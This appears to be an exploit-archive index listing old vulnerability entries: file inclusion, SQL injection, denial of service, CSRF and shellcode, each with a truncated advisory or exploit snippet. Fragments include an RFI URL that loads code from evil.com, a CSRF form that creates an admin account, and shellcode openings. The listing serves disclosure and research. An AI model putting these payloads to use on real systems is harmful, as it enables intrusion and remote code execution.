Magic Photo Storage Website admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...
Ipswitch WhatsUp Professional 2006 Remote Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16771/info Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests. This issue allows remo...
Kartli Alisveris Sistemi 1.0 - Remote SQL Injection Vulnerability
No description provided by source. Discovered by: kerem125 & gsy Website: http://www.kerem125.com/ & http://www.by-gsy.org/ Script download: http://download.asprehberi.net/dosyalar/kategoriler/alisveris/freepaypalshoppingcarttr.zip Exploit:...
PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit (poptop-sane.c)
No description provided by source. / Fixed Exploit against PoPToP in Linux poptop-sane.c ./r4nc0rwh0r3 of blightninjas [email protected] blightninjas: bringing pain, suffering, and humiliation to the security world Expect more great release like helloworld-annotated.c and cd explained...
NoticeWare Email Server 4.6 NG LOGIN Messages Denial Of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/30605/info NoticeWare Email Server NG is prone to a denial-of-service vulnerability because it fails to handle user-supplied input. Remote attackers can exploit this issue to deny service to legitimate users. NoticeWare...
iOS Serversman 3.1.5 - HTTP Remote DoS Exploit
No description provided by source. !/usr/bin/python Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit Found by: Steven Seeley mrme seeleymagic at hotmail dot com Homepage: http://serversman.com/indexen.jsp Download: From the app store Free - use your Itunes account Tested on: Iphone 3G...
PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/713/info The PHP/FI package, which was originally written by Rasmus Lerdorf, is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features...
Campsite 2.6.1 SystemPref.php g_documentRoot Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. Exploiting this issue allows remote attackers to execute code in the context of the webserver. This issue affects Campsite 2.6.1. Earlier...
webSPELL <= 4.01.02 Multiple Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV3 print \n \'/ ; print \n -.- ; print \n -------------------oOO------OOo--------------------; print \n | webSPELL = v4.01.02 Multiple Remote SQL Injection |; print \n | coded by DNX |; print \n...
WordPress MoodThingy Widget 0.8.7 - Blind SQL Injection
No description provided by source. Exploit Title: WordPress MoodThingy Mood Rating Widget v0.8.7 Blind SQL Injection Date: 7/2/12 Exploit Author: Chris Kellum Vendor Homepage: http://www.moodthingy.com/ Software Link: http://downloads.wordpress.org/plugin/moodthingy-mood-rating-widget.0.8.7.zip...
Nero Express 7.9.6.4 - Local Heap PoC
No description provided by source. !/user/bin/perl Exploit Title: Nero Express7 Local Heap Poc Date: 2010/01/01 Author: D3V!L FUCKER Version: Nero Express7 Ver.7.9.6.4 Tested on: windows vista sp0 After Setup Open Nero StartSmart Essentials = Favorites = Open Projects = explit.nir Code : $headr=...
BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8938/info It has been reported that BEA WebLogic InteractiveQuery.jsp example application is prone to a cross-site scripting vulnerability. The issue is reported to exist due to insufficient sanitization of user-supplied dat...
68kb Knowledge Base 1.0.0rc3 - Admin CSRF
No description provided by source. Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF Date: 2010-04-02 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip Version: v1.0.0rc3 html body onload=document.formsedit.submit form name=creat...
Mongoose 2.8 Space String Remote File Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/38145/info Mongoose is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view the source code of files in the context ...
Joomla Component com_start SQL Injection Vulnerability
No description provided by source. InformatioN Title : Joomla Component comstart SQL Injection Vulnerability Author : DevilZ TM By D3v1l Homepage : http://www.DEVILZTM.com Contact : [email protected] & [email protected] ExploiT Vulnerable File :...
Billwerx RC5.2.2 PL2 'primary_number' Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/39867/info Billwerx is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...
Solaris/x86 - Remote Download file - 79 bytes
No description provided by source. / Title: Solaris/x86 - Remote Download file - 79 bytes Author: Jonathan Salwan submit ! shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Database of Shellcodes http://www.shell-storm.org/shellcode/ Date: 2010-05-25...
CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability
No description provided by source. Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& milw0rm.com 2006-12-08...
Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
No description provided by source. source: http://www.securityfocus.com/bid/4877/info Apache Tomcat is a freely available, open source web server maintained by the Apache Foundation. When Apache Tomcat is installed with a default configuration, several example files are also installed. When some ...
Linux/x86 Remote Port Forwarding Shellcode 87 bytes
No description provided by source. / Linux/x86 Remote Port forwarding 87 bytes ssh -R 9999:localhost:22 192.168.0.226 Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom / xor %eax,%eax push %eax pushl $0x3632322e pushl $0x30302e38 push...